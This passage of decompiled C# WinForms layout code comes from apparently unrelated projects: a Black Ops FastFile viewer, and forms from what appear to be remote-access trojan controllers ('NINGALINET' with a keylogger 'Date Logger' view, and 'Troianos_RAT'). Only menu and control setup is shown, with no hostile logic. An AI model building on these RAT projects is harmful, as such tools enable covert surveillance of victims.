     this.CopyToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStrip1              = new global::System.Windows.Forms.ToolStrip();
     this.ToolStripTextBox1       = new global::System.Windows.Forms.ToolStripTextBox();
     this.ToolStripButton1        = new global::System.Windows.Forms.ToolStripButton();
     this.ContextMenuStrip2       = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.ToolStripMenuItem1      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem1     = new global::System.Windows.Forms.ToolStripSeparator();
     this.DeleteToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.TextBox1      = new global::System.Windows.Forms.TextBox();
     this.T1            = new global::System.Windows.Forms.RichTextBox();
     this.ImageList1    = new global::System.Windows.Forms.ImageList(this.components);
     this.Lv1           = new global::NINGALINET.LV();
     this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.sl            = new global::System.Windows.Forms.Label();
     this.ContextMenuStrip1.SuspendLayout();
     this.ToolStrip1.SuspendLayout();
     this.ContextMenuStrip2.SuspendLayout();
     this.SuspendLayout();
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.SaveAsToolStripMenuItem,
         this.SelectAllToolStripMenuItem,
         this.CopyToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_197_0 = this.ContextMenuStrip1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(123, 98);
     arg_197_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1BE_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(122, 22);
     arg_1BE_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1F4_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(119, 6);
     arg_1F4_0.Size = size;
     this.SaveAsToolStripMenuItem.Name = "SaveAsToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_21B_0 = this.SaveAsToolStripMenuItem;
     size           = new global::System.Drawing.Size(122, 22);
     arg_21B_0.Size = size;
     this.SaveAsToolStripMenuItem.Text    = "Save As";
     this.SelectAllToolStripMenuItem.Name = "SelectAllToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_252_0 = this.SelectAllToolStripMenuItem;
     size           = new global::System.Drawing.Size(122, 22);
     arg_252_0.Size = size;
     this.SelectAllToolStripMenuItem.Text = "Select All";
     this.CopyToolStripMenuItem.Name      = "CopyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_289_0 = this.CopyToolStripMenuItem;
     size           = new global::System.Drawing.Size(122, 22);
     arg_289_0.Size = size;
     this.CopyToolStripMenuItem.Text = "Copy";
     this.ToolStrip1.BackColor       = global::System.Drawing.Color.Black;
     this.ToolStrip1.Dock            = global::System.Windows.Forms.DockStyle.Bottom;
     this.ToolStrip1.GripStyle       = global::System.Windows.Forms.ToolStripGripStyle.Hidden;
     this.ToolStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripTextBox1,
         this.ToolStripButton1
     });
     global::System.Windows.Forms.Control arg_304_0 = this.ToolStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 337);
     arg_304_0.Location          = location;
     this.ToolStrip1.Name        = "ToolStrip1";
     this.ToolStrip1.RenderMode  = global::System.Windows.Forms.ToolStripRenderMode.System;
     this.ToolStrip1.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
     global::System.Windows.Forms.Control arg_346_0 = this.ToolStrip1;
     size                               = new global::System.Drawing.Size(584, 25);
     arg_346_0.Size                     = size;
     this.ToolStrip1.TabIndex           = 4;
     this.ToolStrip1.Text               = "ToolStrip1";
     this.ToolStripTextBox1.BackColor   = global::System.Drawing.Color.FromArgb(40, 40, 40);
     this.ToolStripTextBox1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.ToolStripTextBox1.ForeColor   = global::System.Drawing.Color.WhiteSmoke;
     this.ToolStripTextBox1.Name        = "ToolStripTextBox1";
     global::System.Windows.Forms.ToolStripControlHost arg_3BB_0 = this.ToolStripTextBox1;
     size           = new global::System.Drawing.Size(100, 25);
     arg_3BB_0.Size = size;
     this.ToolStripTextBox1.TextBoxTextAlign     = global::System.Windows.Forms.HorizontalAlignment.Right;
     this.ToolStripButton1.DisplayStyle          = global::System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ToolStripButton1.Image                 = (global::System.Drawing.Image)componentResourceManager.GetObject("ToolStripButton1.Image");
     this.ToolStripButton1.ImageTransparentColor = global::System.Drawing.Color.Magenta;
     this.ToolStripButton1.Name = "ToolStripButton1";
     global::System.Windows.Forms.ToolStripItem arg_425_0 = this.ToolStripButton1;
     size                       = new global::System.Drawing.Size(23, 22);
     arg_425_0.Size             = size;
     this.ToolStripButton1.Text = "Find";
     this.ContextMenuStrip2.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripMenuItem1,
         this.AToolStripMenuItem1,
         this.DeleteToolStripMenuItem
     });
     this.ContextMenuStrip2.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_48F_0 = this.ContextMenuStrip2;
     size           = new global::System.Drawing.Size(118, 54);
     arg_48F_0.Size = size;
     this.ToolStripMenuItem1.Name = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_4B6_0 = this.ToolStripMenuItem1;
     size           = new global::System.Drawing.Size(117, 22);
     arg_4B6_0.Size = size;
     this.ToolStripMenuItem1.Text  = "Refresh";
     this.AToolStripMenuItem1.Name = "AToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_4EC_0 = this.AToolStripMenuItem1;
     size           = new global::System.Drawing.Size(114, 6);
     arg_4EC_0.Size = size;
     this.DeleteToolStripMenuItem.Name = "DeleteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_513_0 = this.DeleteToolStripMenuItem;
     size           = new global::System.Drawing.Size(117, 22);
     arg_513_0.Size = size;
     this.DeleteToolStripMenuItem.Text = "Remove";
     this.TextBox1.Dock = global::System.Windows.Forms.DockStyle.Top;
     global::System.Windows.Forms.Control arg_548_0 = this.TextBox1;
     location           = new global::System.Drawing.Point(159, 0);
     arg_548_0.Location = location;
     this.TextBox1.Name = "TextBox1";
     global::System.Windows.Forms.Control arg_572_0 = this.TextBox1;
     size                     = new global::System.Drawing.Size(425, 20);
     arg_572_0.Size           = size;
     this.TextBox1.TabIndex   = 12;
     this.TextBox1.Visible    = false;
     this.T1.BorderStyle      = global::System.Windows.Forms.BorderStyle.None;
     this.T1.ContextMenuStrip = this.ContextMenuStrip1;
     this.T1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.T1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     global::System.Windows.Forms.Control arg_5DE_0 = this.T1;
     location           = new global::System.Drawing.Point(159, 20);
     arg_5DE_0.Location = location;
     this.T1.Name       = "T1";
     global::System.Windows.Forms.Control arg_60B_0 = this.T1;
     size                             = new global::System.Drawing.Size(425, 302);
     arg_60B_0.Size                   = size;
     this.T1.TabIndex                 = 13;
     this.T1.Text                     = global::NINGALINET.My.Resources.Resources.notf;
     this.ImageList1.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
     this.ImageList1.TransparentColor = global::System.Drawing.Color.Transparent;
     this.ImageList1.Images.SetKeyName(0, "148.png");
     this.Lv1.BackColor = global::System.Drawing.Color.Black;
     this.Lv1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1
     });
     this.Lv1.ContextMenuStrip = this.ContextMenuStrip2;
     this.Lv1.Dock             = global::System.Windows.Forms.DockStyle.Left;
     this.Lv1.Font             = new global::System.Drawing.Font("Arial", 8.25f);
     this.Lv1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.Lv1.FullRowSelect    = true;
     this.Lv1.LargeImageList   = this.ImageList1;
     global::System.Windows.Forms.Control arg_716_0 = this.Lv1;
     location           = new global::System.Drawing.Point(0, 0);
     arg_716_0.Location = location;
     this.Lv1.Name      = "Lv1";
     this.Lv1.OwnerDraw = true;
     global::System.Windows.Forms.Control arg_74F_0 = this.Lv1;
     size                    = new global::System.Drawing.Size(159, 322);
     arg_74F_0.Size          = size;
     this.Lv1.SmallImageList = this.ImageList1;
     this.Lv1.TabIndex       = 9;
     this.Lv1.UseCompatibleStateImageBehavior = false;
     this.Lv1.View            = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Date Logger";
     this.ColumnHeader1.Width = 120;
     this.pr.BackColor        = global::System.Drawing.Color.Transparent;
     this.pr.Colors           = new global::NINGALINET.Bloom[0];
     this.pr.Customization    = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock             = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font             = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image            = null;
     global::System.Windows.Forms.Control arg_81E_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 322);
     arg_81E_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_861_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_861_0.Size      = size;
     this.pr.TabIndex    = 7;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     this.sl.Anchor      = (global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left);
     this.sl.AutoSize    = true;
     this.sl.ForeColor   = global::System.Drawing.Color.WhiteSmoke;
     global::System.Windows.Forms.Control arg_8D6_0 = this.sl;
     location           = new global::System.Drawing.Point(4, 343);
     arg_8D6_0.Location = location;
     this.sl.Name       = "sl";
     global::System.Windows.Forms.Control arg_8FD_0 = this.sl;
     size             = new global::System.Drawing.Size(13, 13);
     arg_8FD_0.Size   = size;
     this.sl.TabIndex = 14;
     this.sl.Text     = "..";
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.sl);
     this.Controls.Add(this.T1);
     this.Controls.Add(this.TextBox1);
     this.Controls.Add(this.Lv1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.ToolStrip1);
     this.Name          = "FrmLogger";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "kl";
     this.ContextMenuStrip1.ResumeLayout(false);
     this.ToolStrip1.ResumeLayout(false);
     this.ToolStrip1.PerformLayout();
     this.ContextMenuStrip2.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #16
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Black_Ops_FF_Viewer.Form1));
     this.OD       = new global::System.Windows.Forms.OpenFileDialog();
     this.FileList = new global::System.Windows.Forms.ListBox();
     this.ListMenu = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.CopyToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.InjectToolStripMenuItem  = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SaveToolStripMenuItem1   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RenameToolStripMenuItem  = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ExtractToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.MainMenu = new global::System.Windows.Forms.MenuStrip();
     this.FileToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.OpenToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SaveToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator1   = new global::System.Windows.Forms.ToolStripSeparator();
     this.ToolStripMenuItem1    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ExportAsBlockFileToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator2   = new global::System.Windows.Forms.ToolStripSeparator();
     this.ExitToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Edit = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CutToolStripMenuItem1    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyToolStripMenuItem2   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PasteToolStripMenuItem1  = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator3      = new global::System.Windows.Forms.ToolStripSeparator();
     this.KeyToolStripMenuItem     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Xbox360ToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PS3ToolStripMenuItem     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AboutToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SD                            = new global::System.Windows.Forms.SaveFileDialog();
     this.CodeMenu                      = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.CutToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyToolStripMenuItem1        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PasteToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Code                          = new global::ICSharpCode.TextEditor.TextEditorControl();
     this.FastFileNameToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.FastFileName                  = new global::System.Windows.Forms.ToolStripTextBox();
     this.ListMenu.SuspendLayout();
     this.MainMenu.SuspendLayout();
     this.CodeMenu.SuspendLayout();
     this.SuspendLayout();
     this.FileList.Anchor              = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left);
     this.FileList.ContextMenuStrip    = this.ListMenu;
     this.FileList.Enabled             = false;
     this.FileList.Font                = new global::System.Drawing.Font("Consolas", 9.75f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.FileList.FormattingEnabled   = true;
     this.FileList.HorizontalScrollbar = true;
     this.FileList.ItemHeight          = 15;
     global::System.Windows.Forms.Control fileList = this.FileList;
     global::System.Drawing.Point         location = new global::System.Drawing.Point(1, 24);
     fileList.Location  = location;
     this.FileList.Name = "FileList";
     global::System.Windows.Forms.Control fileList2 = this.FileList;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(315, 454);
     fileList2.Size         = size;
     this.FileList.TabIndex = 4;
     this.ListMenu.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.CopyToolStripMenuItem,
         this.InjectToolStripMenuItem,
         this.ExtractToolStripMenuItem
     });
     this.ListMenu.Name = "ListMenu";
     global::System.Windows.Forms.Control listMenu = this.ListMenu;
     size          = new global::System.Drawing.Size(159, 70);
     listMenu.Size = size;
     this.CopyToolStripMenuItem.Name = "CopyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copyToolStripMenuItem = this.CopyToolStripMenuItem;
     size = new global::System.Drawing.Size(158, 22);
     copyToolStripMenuItem.Size      = size;
     this.CopyToolStripMenuItem.Text = "Copy File Name";
     this.InjectToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SaveToolStripMenuItem1,
         this.RenameToolStripMenuItem
     });
     this.InjectToolStripMenuItem.Name = "InjectToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem injectToolStripMenuItem = this.InjectToolStripMenuItem;
     size = new global::System.Drawing.Size(158, 22);
     injectToolStripMenuItem.Size      = size;
     this.InjectToolStripMenuItem.Text = "Inject";
     this.SaveToolStripMenuItem1.Name  = "SaveToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem saveToolStripMenuItem = this.SaveToolStripMenuItem1;
     size = new global::System.Drawing.Size(117, 22);
     saveToolStripMenuItem.Size        = size;
     this.SaveToolStripMenuItem1.Text  = "Save";
     this.RenameToolStripMenuItem.Name = "RenameToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem renameToolStripMenuItem = this.RenameToolStripMenuItem;
     size = new global::System.Drawing.Size(117, 22);
     renameToolStripMenuItem.Size       = size;
     this.RenameToolStripMenuItem.Text  = "Rename";
     this.ExtractToolStripMenuItem.Name = "ExtractToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem extractToolStripMenuItem = this.ExtractToolStripMenuItem;
     size = new global::System.Drawing.Size(158, 22);
     extractToolStripMenuItem.Size      = size;
     this.ExtractToolStripMenuItem.Text = "Extract";
     this.MainMenu.BackColor            = global::System.Drawing.SystemColors.GradientInactiveCaption;
     this.MainMenu.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.FileToolStripMenuItem,
         this.Edit,
         this.KeyToolStripMenuItem,
         this.AboutToolStripMenuItem
     });
     global::System.Windows.Forms.Control mainMenu = this.MainMenu;
     location           = new global::System.Drawing.Point(0, 0);
     mainMenu.Location  = location;
     this.MainMenu.Name = "MainMenu";
     global::System.Windows.Forms.Control mainMenu2 = this.MainMenu;
     size                   = new global::System.Drawing.Size(953, 24);
     mainMenu2.Size         = size;
     this.MainMenu.TabIndex = 5;
     this.MainMenu.Text     = "MainMenu";
     this.FileToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.OpenToolStripMenuItem,
         this.SaveToolStripMenuItem,
         this.ToolStripSeparator1,
         this.ToolStripMenuItem1,
         this.ExportAsBlockFileToolStripMenuItem,
         this.ToolStripSeparator2,
         this.ExitToolStripMenuItem
     });
     this.FileToolStripMenuItem.Name = "FileToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem fileToolStripMenuItem = this.FileToolStripMenuItem;
     size = new global::System.Drawing.Size(37, 20);
     fileToolStripMenuItem.Size      = size;
     this.FileToolStripMenuItem.Text = "File";
     this.OpenToolStripMenuItem.Name = "OpenToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem openToolStripMenuItem = this.OpenToolStripMenuItem;
     size = new global::System.Drawing.Size(163, 22);
     openToolStripMenuItem.Size      = size;
     this.OpenToolStripMenuItem.Text = "Open";
     this.SaveToolStripMenuItem.Name = "SaveToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem saveToolStripMenuItem2 = this.SaveToolStripMenuItem;
     size = new global::System.Drawing.Size(163, 22);
     saveToolStripMenuItem2.Size     = size;
     this.SaveToolStripMenuItem.Text = "Save";
     this.ToolStripSeparator1.Name   = "ToolStripSeparator1";
     global::System.Windows.Forms.ToolStripItem toolStripSeparator = this.ToolStripSeparator1;
     size = new global::System.Drawing.Size(160, 6);
     toolStripSeparator.Size      = size;
     this.ToolStripMenuItem1.Name = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem toolStripMenuItem = this.ToolStripMenuItem1;
     size = new global::System.Drawing.Size(163, 22);
     toolStripMenuItem.Size       = size;
     this.ToolStripMenuItem1.Text = "Import Block File";
     this.ExportAsBlockFileToolStripMenuItem.Name = "ExportAsBlockFileToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem exportAsBlockFileToolStripMenuItem = this.ExportAsBlockFileToolStripMenuItem;
     size = new global::System.Drawing.Size(163, 22);
     exportAsBlockFileToolStripMenuItem.Size      = size;
     this.ExportAsBlockFileToolStripMenuItem.Text = "Export Block File";
     this.ToolStripSeparator2.Name = "ToolStripSeparator2";
     global::System.Windows.Forms.ToolStripItem toolStripSeparator2 = this.ToolStripSeparator2;
     size = new global::System.Drawing.Size(160, 6);
     toolStripSeparator2.Size        = size;
     this.ExitToolStripMenuItem.Name = "ExitToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem exitToolStripMenuItem = this.ExitToolStripMenuItem;
     size = new global::System.Drawing.Size(163, 22);
     exitToolStripMenuItem.Size      = size;
     this.ExitToolStripMenuItem.Text = "Exit";
     this.Edit.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.CutToolStripMenuItem1,
         this.CopyToolStripMenuItem2,
         this.PasteToolStripMenuItem1,
         this.ToolStripSeparator3,
         this.FastFileNameToolStripMenuItem
     });
     this.Edit.Enabled = false;
     this.Edit.Name    = "Edit";
     global::System.Windows.Forms.ToolStripItem edit = this.Edit;
     size           = new global::System.Drawing.Size(39, 20);
     edit.Size      = size;
     this.Edit.Text = "Edit";
     this.CutToolStripMenuItem1.Name = "CutToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem cutToolStripMenuItem = this.CutToolStripMenuItem1;
     size = new global::System.Drawing.Size(152, 22);
     cutToolStripMenuItem.Size        = size;
     this.CutToolStripMenuItem1.Text  = "Cut";
     this.CopyToolStripMenuItem2.Name = "CopyToolStripMenuItem2";
     global::System.Windows.Forms.ToolStripItem copyToolStripMenuItem2 = this.CopyToolStripMenuItem2;
     size = new global::System.Drawing.Size(152, 22);
     copyToolStripMenuItem2.Size       = size;
     this.CopyToolStripMenuItem2.Text  = "Copy";
     this.PasteToolStripMenuItem1.Name = "PasteToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem pasteToolStripMenuItem = this.PasteToolStripMenuItem1;
     size = new global::System.Drawing.Size(152, 22);
     pasteToolStripMenuItem.Size       = size;
     this.PasteToolStripMenuItem1.Text = "Paste";
     this.ToolStripSeparator3.Name     = "ToolStripSeparator3";
     global::System.Windows.Forms.ToolStripItem toolStripSeparator3 = this.ToolStripSeparator3;
     size = new global::System.Drawing.Size(149, 6);
     toolStripSeparator3.Size = size;
     this.KeyToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.Xbox360ToolStripMenuItem,
         this.PS3ToolStripMenuItem
     });
     this.KeyToolStripMenuItem.Name = "KeyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem keyToolStripMenuItem = this.KeyToolStripMenuItem;
     size = new global::System.Drawing.Size(38, 20);
     keyToolStripMenuItem.Size                  = size;
     this.KeyToolStripMenuItem.Text             = "Key";
     this.Xbox360ToolStripMenuItem.CheckOnClick = true;
     this.Xbox360ToolStripMenuItem.Name         = "Xbox360ToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem xbox360ToolStripMenuItem = this.Xbox360ToolStripMenuItem;
     size = new global::System.Drawing.Size(121, 22);
     xbox360ToolStripMenuItem.Size          = size;
     this.Xbox360ToolStripMenuItem.Text     = "Xbox 360";
     this.PS3ToolStripMenuItem.Checked      = true;
     this.PS3ToolStripMenuItem.CheckOnClick = true;
     this.PS3ToolStripMenuItem.CheckState   = global::System.Windows.Forms.CheckState.Checked;
     this.PS3ToolStripMenuItem.Name         = "PS3ToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem ps3ToolStripMenuItem = this.PS3ToolStripMenuItem;
     size = new global::System.Drawing.Size(121, 22);
     ps3ToolStripMenuItem.Size        = size;
     this.PS3ToolStripMenuItem.Text   = "PS3";
     this.AboutToolStripMenuItem.Name = "AboutToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem aboutToolStripMenuItem = this.AboutToolStripMenuItem;
     size = new global::System.Drawing.Size(52, 20);
     aboutToolStripMenuItem.Size      = size;
     this.AboutToolStripMenuItem.Text = "About";
     this.CodeMenu.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.CutToolStripMenuItem,
         this.CopyToolStripMenuItem1,
         this.PasteToolStripMenuItem
     });
     this.CodeMenu.Name = "CodeMenu";
     global::System.Windows.Forms.Control codeMenu = this.CodeMenu;
     size          = new global::System.Drawing.Size(103, 70);
     codeMenu.Size = size;
     this.CutToolStripMenuItem.Name = "CutToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem cutToolStripMenuItem2 = this.CutToolStripMenuItem;
     size = new global::System.Drawing.Size(102, 22);
     cutToolStripMenuItem2.Size       = size;
     this.CutToolStripMenuItem.Text   = "Cut";
     this.CopyToolStripMenuItem1.Name = "CopyToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem copyToolStripMenuItem3 = this.CopyToolStripMenuItem1;
     size = new global::System.Drawing.Size(102, 22);
     copyToolStripMenuItem3.Size      = size;
     this.CopyToolStripMenuItem1.Text = "Copy";
     this.PasteToolStripMenuItem.Name = "PasteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem pasteToolStripMenuItem2 = this.PasteToolStripMenuItem;
     size = new global::System.Drawing.Size(102, 22);
     pasteToolStripMenuItem2.Size     = size;
     this.PasteToolStripMenuItem.Text = "Paste";
     this.Code.Anchor           = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
     this.Code.ContextMenuStrip = this.CodeMenu;
     this.Code.Enabled          = false;
     this.Code.IsReadOnly       = false;
     global::System.Windows.Forms.Control code = this.Code;
     location       = new global::System.Drawing.Point(322, 24);
     code.Location  = location;
     this.Code.Name = "Code";
     global::System.Windows.Forms.Control code2 = this.Code;
     size               = new global::System.Drawing.Size(631, 454);
     code2.Size         = size;
     this.Code.TabIndex = 6;
     this.FastFileNameToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.FastFileName
     });
     this.FastFileNameToolStripMenuItem.Name = "FastFileNameToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem fastFileNameToolStripMenuItem = this.FastFileNameToolStripMenuItem;
     size = new global::System.Drawing.Size(152, 22);
     fastFileNameToolStripMenuItem.Size      = size;
     this.FastFileNameToolStripMenuItem.Text = "FastFile Name";
     this.FastFileName.MaxLength             = 32;
     this.FastFileName.Name = "FastFileName";
     global::System.Windows.Forms.ToolStripControlHost fastFileName = this.FastFileName;
     size = new global::System.Drawing.Size(100, 23);
     fastFileName.Size = size;
     this.FastFileName.TextBoxTextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.SystemColors.GradientInactiveCaption;
     size            = new global::System.Drawing.Size(953, 479);
     this.ClientSize = size;
     this.Controls.Add(this.Code);
     this.Controls.Add(this.MainMenu);
     this.Controls.Add(this.FileList);
     this.Icon          = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
     this.MainMenuStrip = this.MainMenu;
     this.Name          = "Form1";
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Black Ops - FastFile Viewer";
     this.ListMenu.ResumeLayout(false);
     this.MainMenu.ResumeLayout(false);
     this.MainMenu.PerformLayout();
     this.CodeMenu.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 private void InitializeComponent()
 {
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Troianos_RAT.Note));
     this.MenuStrip1         = new global::System.Windows.Forms.MenuStrip();
     this.ToolStripMenuItem1 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.TextBox1           = new global::System.Windows.Forms.TextBox();
     this.MenuStrip1.SuspendLayout();
     this.SuspendLayout();
     this.MenuStrip1.BackColor = global::System.Drawing.Color.Black;
     this.MenuStrip1.Font      = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
     this.MenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripMenuItem1
     });
     this.MenuStrip1.LayoutStyle = global::System.Windows.Forms.ToolStripLayoutStyle.Flow;
     global::System.Windows.Forms.Control menuStrip = this.MenuStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 0);
     menuStrip.Location   = location;
     this.MenuStrip1.Name = "MenuStrip1";
     global::System.Windows.Forms.Control menuStrip2 = this.MenuStrip1;
     global::System.Drawing.Size          size       = new global::System.Drawing.Size(629, 22);
     menuStrip2.Size                   = size;
     this.MenuStrip1.TabIndex          = 0;
     this.MenuStrip1.Text              = "MenuStrip1";
     this.ToolStripMenuItem1.ForeColor = global::System.Drawing.Color.White;
     this.ToolStripMenuItem1.Name      = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem toolStripMenuItem = this.ToolStripMenuItem1;
     size = new global::System.Drawing.Size(115, 18);
     toolStripMenuItem.Size       = size;
     this.ToolStripMenuItem1.Text = "Salvar Alteraçoes";
     this.TextBox1.BackColor      = global::System.Drawing.Color.Black;
     this.TextBox1.BorderStyle    = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.TextBox1.Dock           = global::System.Windows.Forms.DockStyle.Fill;
     this.TextBox1.ForeColor      = global::System.Drawing.Color.White;
     global::System.Windows.Forms.Control textBox = this.TextBox1;
     location                 = new global::System.Drawing.Point(0, 22);
